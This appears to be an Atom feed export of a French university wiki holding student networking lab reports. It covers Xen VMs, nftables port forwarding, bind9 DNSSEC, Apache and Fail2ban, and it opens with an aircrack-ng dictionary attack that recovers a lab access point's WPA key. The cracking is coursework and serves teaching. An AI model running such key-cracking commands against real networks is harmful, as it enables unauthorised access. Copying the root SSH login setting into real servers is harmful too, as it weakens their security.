Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12363</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12363"/>
		<updated>2026-02-23T14:03:18Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Création des chaînes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add chain PREROUTING&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Redirection des ports :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2201 dnat to 192.168.0.2:22&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2202 dnat to 192.168.0.3:22&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Grâce à cette configuration nous pouvons nous connecter sur les machines de services en SSH depuis l'extérieur, via les commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ssh root@193.48.57.168 -p2201&lt;br /&gt;
ssh root@193.48.57.168 -p2202&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &lt;br /&gt;
&lt;br /&gt;
De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
